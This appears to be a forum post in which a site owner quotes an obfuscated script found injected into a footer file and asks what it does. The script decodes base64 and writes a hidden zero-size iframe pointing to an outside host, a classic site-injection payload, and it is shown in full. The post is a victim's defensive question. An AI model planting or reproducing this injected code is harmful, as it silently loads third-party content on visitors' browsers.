|
Some crazy script inserted into my footer file, can anyone tell what it's doing?
Onload the page was automatically scrolling to the bottom, found this in a footer file:
<script>eval('function globalwat(t){var k=\'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrst uvwxyz0123456789+/=\';var o=\'\';var q,w,e;var a,s,d,f;var i=0;do{a = k.indexOf(t.charAt(i++));s=k.indexOf(t.charAt(i++) );d=k.indexOf(t.charAt(i++));f=k.indexOf(t.charAt( i++));q=(a << 2) | (s >> 4);w=((s & 15) << 4) | (d >> 2);e=((d & 3) << 6) | f;o=o+String.fromCharCode(q);if(d!=64) o=o+String.fromCharCode(w); if(f!=64) o=o+String.fromCharCode(e);} while(i<t.length);document.write(o);};globalwat(\' PGlmcmFtZSBzcmM9Imh0dHA6Ly9nbG9iYWx3YXQuY29tL2NvdW 50ZXIvaW4uY2dpP3NldmVuIiB3aWR0aD0iMCIgaGVpZ2h0PSIw IiBib3JkZXI9IjAiIHN0eWxlPSJib3JkZXI6MDsiPjwvaWZyYW 1lPg==\');');</script>
How the fuck did this bs get there.. anyone know what it's doing besides setting the scroll location?
|